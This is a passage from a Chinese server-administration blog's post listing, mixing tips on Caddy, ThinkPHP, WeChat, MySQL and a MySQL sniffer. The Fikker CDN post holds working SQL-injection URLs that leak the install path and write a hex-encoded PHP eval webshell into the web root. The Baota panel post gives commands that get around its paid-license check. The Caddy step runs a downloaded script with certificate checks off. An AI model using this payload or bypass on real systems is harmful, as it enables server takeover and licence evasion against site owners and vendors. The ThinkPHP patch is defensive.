Caddy是一个使用Go语言写的HTTP Server

jincon 发表于 2019-01-05, 12:36 AM

Caddy是一个使用Go语言写的HTTP Server,开在性能上或许比不上Nginx,但是在上手及配置难度上面真的是比Nginx简单许多。同时Caddy支持自动签订Let’s Encrypt SSL证书,只需要提供一个可用邮箱即可 

wget -N --no-check-certificate https://raw.githubusercontent.com
/ToyoDAdoubi/doubi/master/caddy_install.sh && chmod +x caddy_install.sh 
&& bash caddy_install.sh install http.filemanager
Caddy使用命令
启动:/etc/init.d/caddy start
停止:/etc/init.d/caddy stop
重启:/etc/init.d/caddy restart
查看状态:/etc/init.d/caddy status
查看Caddy启动日志: tail -f /tmp/caddy.log
Caddy配置文件位置:/usr/local/caddy/Caddyfile
Caddy自动申请SSL证书位置:/.caddy/acme/acme-v01.api.letsencrypt.org/sites/xxx.xxx(域名)/

发表在: 服务器运维 0 条评论 阅读 793 次

Fikker主控php端可能存在0day漏洞,影响所有版本

jincon 发表于 2018-12-31, 10:10 PM

Fikker 是一款面向 CDN/站长 的专业级网站缓存(Webcache)和反向代理服务器软件(Reversed Proxy Server)。近日在一起安全事件中发现fikker主控多个php文件存在高危注入漏洞,可获取Webshell  

#爆目录
admin_modify.php?id=-1%20union%20select%201,
@@basedir,3,4,5,6,7,8,9,10,11,12,13
#写一句话
admin_modify.php?id=1%20and%201=2%20union%20
select%200x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,
0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e,9,10,11,12,13%20into%20outfile%20%27d:/FikkerCDN/webroot/fikcdn/admin/test.php%27

发表在: 安全技术 0 条评论 阅读 1326 次

Thinkphp5控制器名过滤不严导致getshell的解决方法

jincon 发表于 2018-12-28, 8:10 PM

Thinkphp5控制器名过滤不严导致getshell,网上很多人放出getshell脚本。

修复方法: 

5.0版本
在think\App类的module方法的获取控制器的代码后面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}
5.1版本
在think\route\dispatch\Url类的parseUrl方法,解析控制器后加上

if ($controller && !preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}
自行增加相关代码。(5.0版本代码 | 5.1版本代码


发表在: php开发 0 条评论 阅读 4779 次

微信分享到朋友圈onMenuShareTimeline成功后的回调函数不执行的解决方法

jincon 发表于 2018-12-28, 11:27 AM

微信分享到朋友圈onMenuShareTimeline成功后的回调函数不执行的解决方法

测试IOS不支持,具体解决方法: 

//以下代码放入success内,
setTimeout(function(){
   //回调要执行的代码
}, 500);

发表在: 前端技术 0 条评论 阅读 984 次

MySQL主机localhost比127.0.0.1慢,你知道他们的区别吗?

jincon 发表于 2018-12-26, 12:14 PM

1. mysql -h 127.0.0.1 的时候,使用TCP/IP连接, mysql server 认为该连接来自于127.0.0.1

或者是"localhost.localdomain"


2. mysql -h localhost 的时候,是不使用TCP/IP连接的,而使用Unix socket;

此时,mysql server则认为该client是来自"localhost"


localhost也叫local ,正确的解释是:本地服务器 
127.0.0.1在windows等系统的正确解释是:本机地址(本机服务器) 

localhot(local)是不经网卡传输!这点很重要,它不受网络防火墙和网卡相关的的限制。 

127.0.0.1是通过网卡传输,依赖网卡,并受到网络防火墙和网卡相关的限制。 

一般设置程序时本地服务用localhost是最好的,localhost不会解析成ip,也不会占用网卡、网络资源。 


关键词: mysql

发表在: Mysql技术 0 条评论 阅读 714 次

微信小程序HTML富文本渲染方案Html2Wxml2J

jincon 发表于 2018-12-25, 12:56 AM

曾经有wxParse,一个小程序前端使用的javascript库,前端直接转换渲染。使用到了微信小程序的模板渲染,但是依然弱鸡,经常出现各种Javascript错误,很多标签不兼容。

推荐一个比较靠谱的解析微信小程序渲染方案:

靠谱的小程序插件项目-html2wxml

1、设置=》第三方服务=》添加插件

2、app.json 里面添加插件 


 "plugins": {
 	"htmltowxml": {
 		"version": "1.3.0",
 		"provider": "wxa51b9c855ae38f3c"
 	}
 }


» 阅读全文

发表在: 前端技术 0 条评论 阅读 1149 次

宝塔控制面板5.9系列版本破解方法

jincon 发表于 2018-12-24, 7:09 PM

宝塔控制面板5.9系列版本破解方法

现在基本上烂大街了。

先切换使用root用户
sudo su root


升级到宝塔专业版
wget -O update.sh http://download.bt.cn/install/update_pro.sh && bash update.sh pro

运行
echo > /www/server/panel/data/userInfo.json

然后重启你的面板
/etc/init.d/bt restart

发表在: 服务器运维 0 条评论 阅读 1559 次

Centos下使用MySQL Sniffer实时监控审计Mysql语句

jincon 发表于 2018-12-21, 8:16 PM

Centos下使用MySQL Sniffer实时监控审计Mysql语句

先安装依赖 

yum install glib2-devel libpcap-devel libnet-devel
下载地址: 


https://github.com/Qihoo360/mysql-sniffer
安装: 


cd mysql-sniffer
mkdir proj
cd proj


» 阅读全文

发表在: php开发 0 条评论 阅读 643 次
Total: 478‹ Prev1234567Next ›Last »